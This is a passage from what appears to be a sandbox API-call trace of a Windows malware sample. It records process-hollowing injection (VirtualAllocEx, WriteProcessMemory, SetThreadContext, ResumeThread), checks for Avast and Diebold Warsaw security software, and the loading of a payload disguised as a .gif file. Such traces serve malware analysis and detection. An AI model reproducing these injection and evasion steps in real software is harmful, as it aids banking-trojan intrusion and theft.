[206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0187.735] ReadProcessMemory (in: hProcess=0x134, lpBaseAddress=0x7ffdc008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0187.735] VirtualAllocEx (hProcess=0x134, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0187.735] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1b90000
[0187.735] VirtualAlloc (lpAddress=0x1b90000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x1b90000
[0187.737] VirtualAlloc (lpAddress=0x1b70000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x1b70000
[0187.741] WriteProcessMemory (in: hProcess=0x134, lpBaseAddress=0x400000, lpBuffer=0x1b6cad0*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x1b6cad0*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0187.751] WriteProcessMemory (in: hProcess=0x134, lpBaseAddress=0x7ffdc008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0187.752] SetThreadContext (hThread=0x138, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdc000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x12fba8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0187.752] ResumeThread (hThread=0x138) returned 0x1
[0187.752] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0187.752] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0187.752] GlobalUnlock (hMem=0x95000c) returned 0
[0187.752] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0187.752] GlobalUnlock (hMem=0x950004) returned 0
[0187.759] Sleep (dwMilliseconds=0xe74e)
[0199.003] VirtualFree (lpAddress=0x1bd0000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0199.003] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0199.003] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0199.004] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0199.004] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0199.004] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140
[0199.004] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0199.004] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0199.004] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0199.004] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0199.007] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0199.007] ReadFile (in: hFile=0x140, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0199.014] CloseHandle (hObject=0x140) returned 1
[0199.014] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.015] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.015] GlobalUnlock (hMem=0x95000c) returned 0
[0199.015] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0199.015] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.016] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.016] GlobalUnlock (hMem=0x95000c) returned 0
[0199.016] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0199.017] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0199.018] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0199.018] GlobalUnlock (hMem=0x95000c) returned 0
[0199.018] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0199.018] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0199.019] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0199.019] GlobalUnlock (hMem=0x95000c) returned 0
[0199.019] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0199.019] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0199.020] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0199.020] GlobalUnlock (hMem=0x95000c) returned 0
[0199.020] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0199.021] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0199.022] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0199.022] GlobalUnlock (hMem=0x95000c) returned 0
[0199.022] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0199.023] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.024] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.024] GlobalUnlock (hMem=0x95000c) returned 0
[0199.024] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0199.024] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.025] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.025] GlobalUnlock (hMem=0x95000c) returned 0
[0199.025] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0199.025] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.026] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.026] GlobalUnlock (hMem=0x95000c) returned 0
[0199.026] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0199.026] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.027] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.027] GlobalUnlock (hMem=0x95000c) returned 0
[0199.027] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0199.027] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.028] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.028] GlobalUnlock (hMem=0x95000c) returned 0
[0199.028] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0199.028] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.029] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.029] GlobalUnlock (hMem=0x95000c) returned 0
[0199.029] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0199.029] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.030] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.030] GlobalUnlock (hMem=0x95000c) returned 0
[0199.030] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0199.030] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.031] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.031] GlobalUnlock (hMem=0x95000c) returned 0
[0199.031] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0199.031] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.032] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.032] GlobalUnlock (hMem=0x95000c) returned 0
[0199.032] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0199.032] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.033] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.033] GlobalUnlock (hMem=0x95000c) returned 0
[0199.033] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0199.035] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0199.036] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0199.036] GlobalUnlock (hMem=0x95000c) returned 0
[0199.036] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0199.036] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0199.037] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0199.037] GlobalUnlock (hMem=0x95000c) returned 0
[0199.037] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0199.039] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0199.040] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0199.040] GlobalUnlock (hMem=0x95000c) returned 0
[0199.040] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0199.040] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.041] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.041] GlobalUnlock (hMem=0x95000c) returned 0
[0199.041] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0199.041] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.042] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.042] GlobalUnlock (hMem=0x95000c) returned 0
[0199.042] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0199.042] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.043] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.043] GlobalUnlock (hMem=0x95000c) returned 0
[0199.043] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0199.043] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.044] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.044] GlobalUnlock (hMem=0x95000c) returned 0
[0199.044] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0199.044] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.045] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.045] GlobalUnlock (hMem=0x95000c) returned 0
[0199.045] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0199.045] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.045] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.045] GlobalUnlock (hMem=0x95000c) returned 0
[0199.046] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0199.046] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.046] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.046] GlobalUnlock (hMem=0x95000c) returned 0
[0199.046] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0199.047] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.047] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.047] GlobalUnlock (hMem=0x95000c) returned 0
[0199.047] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0199.047] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.048] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.048] GlobalUnlock (hMem=0x95000c) returned 0
[0199.048] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0199.048] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.059] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.059] GlobalUnlock (hMem=0x95000c) returned 0
[0199.059] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0199.059] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.060] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.060] GlobalUnlock (hMem=0x95000c) returned 0
[0199.060] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0199.060] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.061] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.061] GlobalUnlock (hMem=0x95000c) returned 0
[0199.061] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0199.061] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.062] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.062] GlobalUnlock (hMem=0x95000c) returned 0
[0199.062] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0199.062] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.063] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.063] GlobalUnlock (hMem=0x95000c) returned 0
[0199.063] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0199.063] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.064] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.064] GlobalUnlock (hMem=0x95000c) returned 0
[0199.064] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0199.064] GlobalLock (hMem=0x95000c) returned 0x39b8c0
